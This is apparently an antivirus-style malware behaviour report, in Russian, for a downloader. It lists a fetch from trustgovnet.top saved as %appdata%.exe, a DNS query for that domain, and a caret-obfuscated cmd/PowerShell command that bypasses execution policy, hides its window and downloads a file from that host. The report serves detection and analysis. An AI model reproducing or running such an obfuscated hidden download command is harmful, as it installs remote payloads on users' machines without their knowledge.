Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POw^ErSHE^l^l^.^EXe^ -^Ex^e^CuTiOn^p^o^lIcy ^BY^Pa^Ss -nOPROFilE -^wI^N^DoW^St^Yl^e ^HIdd^EN (^nEW-^OBje^C^T S^YSte^m.^net.^WE^b^CLiEn^T^)^.do^WNloa^DF^Ile(^'http://trustgovnet....
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /c "POw^ErSHE^l^l^.^EXe^ -^Ex^e^CuTiOn^p^o^lIcy ^BY^Pa^Ss -nOPROFilE -^wI^N^DoW^St^Yl^e ^HIdd^EN (^nEW-^OBje^C^T S^YSte^m.^net.^WE^b^CLiEn^T^)^.do^WNloa^DF^Ile(^'http://trustgovnet....' (со скрытым окном)